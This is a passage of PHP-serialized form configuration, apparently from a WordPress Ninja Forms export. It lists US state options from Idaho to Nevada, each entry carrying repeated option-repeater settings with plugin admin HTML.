dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:13;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Idaho\";s:5:\"value\";s:2:\"ID\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:14;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Illinois\";s:5:\"value\";s:2:\"IL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:15;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Indiana\";s:5:\"value\";s:2:\"IN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:16;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:4:\"Iowa\";s:5:\"value\";s:2:\"IA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:17;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Kansas\";s:5:\"value\";s:2:\"KS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:18;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Kentucky\";s:5:\"value\";s:2:\"KY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:19;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:9:\"Louisiana\";s:5:\"value\";s:2:\"LA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:20;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Maine\";s:5:\"value\";s:2:\"ME\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:21;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Maryland\";s:5:\"value\";s:2:\"MD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:22;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:13:\"Massachusetts\";s:5:\"value\";s:2:\"MA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:23;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Michigan\";s:5:\"value\";s:2:\"MI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:24;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:9:\"Minnesota\";s:5:\"value\";s:2:\"MN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:25;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:11:\"Mississippi\";s:5:\"value\";s:2:\"MS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:26;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Missouri\";s:5:\"value\";s:2:\"MO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:27;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Montana\";s:5:\"value\";s:2:\"MT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:28;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Nebraska\";s:5:\"value\";s:2:\"NE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:29;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Nevada\";s:5:\"value\";s:2:\"NV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 